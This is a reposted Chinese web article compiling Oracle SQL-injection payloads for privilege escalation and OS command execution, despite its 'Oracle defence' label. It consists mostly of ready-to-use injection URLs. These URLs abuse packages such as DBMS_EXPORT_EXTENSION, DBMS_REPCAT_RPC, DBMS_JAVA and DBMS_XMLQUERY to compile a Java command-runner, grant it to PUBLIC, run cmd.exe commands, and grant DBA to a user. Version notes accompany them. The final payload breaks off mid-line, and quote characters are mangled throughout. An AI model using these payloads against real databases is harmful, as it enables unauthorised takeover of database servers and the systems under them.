oracle盲注报错语句和oracle提权语句汇总[Oracle防范]
本文“oracle盲注报错语句和oracle提权语句汇总[Oracle防范]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””begin dbms_java.grant_permission(”””PUBLIC””””, ””””SYS:java.io.FilePermission””””,””””<>””””, ””””execute””””);end;””;END;”;END;–’,'SYS’,0,’1′,0) from dual) is not null-
Create$Functio
http://ooo/1.jsp?1=String'’ and (select
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”
.PUT(:P1);EXECUTE IMMEDIATE
”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create
or replace function LinxRunCMD(p_cmd in
varchar2) return varchar2 as language java name
””””LinxUtil.runCMD(java.lang.String) return String””””;
””;END;”;END;–’,'SYS’,0,’1′,0) from dual) is not null-
Grant$function$execute$Privilege
http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(‘FOO’,'BAR’,'DBMS_OUTPUT”.PUT(:P1);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””grant all on LinxRunCMD to public””;END;”;END;–’,'SYS’,0,’1′,0) from dual) is not null –
Execute$OS$Code
http://ooo/1.jsp?1=String'’ and (select sys.LinxRunCMD(‘cmd.exe /c whoami’) from dual) is not null-
利用java的权限
影响系统:10g R2, 11g R1 and 11g R2
a) DBMS_JAVA.RUNJAV
影响系统:11gR1,11gR2
http://ooo/1.jsp?1=String'’ and (SELECT DBMS_JAVA.RUNJAVA (‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>C:\\OUT.LST’) FROM DUAL) is not null –
b) DBMS_JAVA_TEST.FUNCAL
影响系统:10g R2, 11g R1,11g R2
http://ooo/1.jsp?1=String'’ and (Select DBMS_JAVA_TEST.FUNCALL (‘oracle/aurora/util/Wrapper’,'main’,'c:\\windows\\system32\\cmd.exe’,'/c’,'dir>c:\\OUT2.LST’) FROM DUAL) is not null—
DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC
影响系统:Oracle 8, 9,10g R1, 10g R2, 11g R1
-
1. Create Library
http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create or replace and compile java source named “LinxUtil” as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str+=stemp+”\n”;myReader.close();return str;} catch (Exception e){returne.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+”\n”;myReader.close();return str;} catch (Exception e){return e.toString();}}}””;END;”;END;–‘,’CCCCC’) from dual) is not null-
2. Granting JAVA permissions
http://www.110hack.com /1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ””create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ””””LinxUtil.runCMD(java.lang.String) return String””””;””;END;”;END;–’,'CCCCC’) from dual) is not null –
3. Making function executable by PUBLIC
http://ooo/1.jsp?1=String'’ and (select SYS.DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC(USER,’VALIDATE_GRP_OBJECTS_LOCAL(:canon_gname);EXECUTE IMMEDIATE ”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGINEXECUTE IMMEDIATE ””grant all on LinxRunCMD to public””;END;”;END;–‘,’CCCCC’) from dual) is not null –
4. Executing OS Code
http://ooo/1.jsp?1=String'’ and (select sys.LinxRunCMD(‘cmd.exe /c whoami ‘) from dual) is not null –
打补钉后的:需求CREATE PROCEDURE权限
1.Create Function
http://www.110hack.com /default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ”create or replace function pwn2 return varchar2 authid current_user is PRAGMA autonomous_transaction;BEGIN execute immediate ””grant dba to scott””;commit;return ””z””;END; ”; commit; end;’) from dual) is not null –
2. Exploiting SYS.L
http://ooo/default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ” begin SYS.LT.CREATEWORKSPACE(””A10”””” and scott.pwn2()=””””x””); YS.LT.REMOVEWORKSPACE(””A10”””” and scott.pwn2()=””””x””);end;”; commit; end;’) from dual) is not null –
Let’s look at CPU of October 2010 (vulnerable versions 10gR1, 10gR2, 11g R1 and 11gR2) and look at the vulnerability in package sys.dbms_cdc_publish.create_change_set which allows a user with EXECUTE_CATALOG_ROLE privilege to become DBA.
http://ooo/default.jsp?1=intenger and (select dbms_xmlquery.newcontext(‘declare PRAGMAAUTONOMOUS_TRANSACTION
以上是“oracle盲注报错语句和oracle提权语句汇总[Oracle防范]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
| 本文地址: | 与您的QQ/BBS好友分享! |
- 好的评价 如果您觉得此文章好,就请您
0%(0) 
- 差的评价 如果您觉得此文章差,就请您
0%(0) 
中查找“oracle盲注报错语句和oracle提权语句汇总”更多相关内容
中查找“oracle盲注报错语句和oracle提权语句汇总”更多相关内容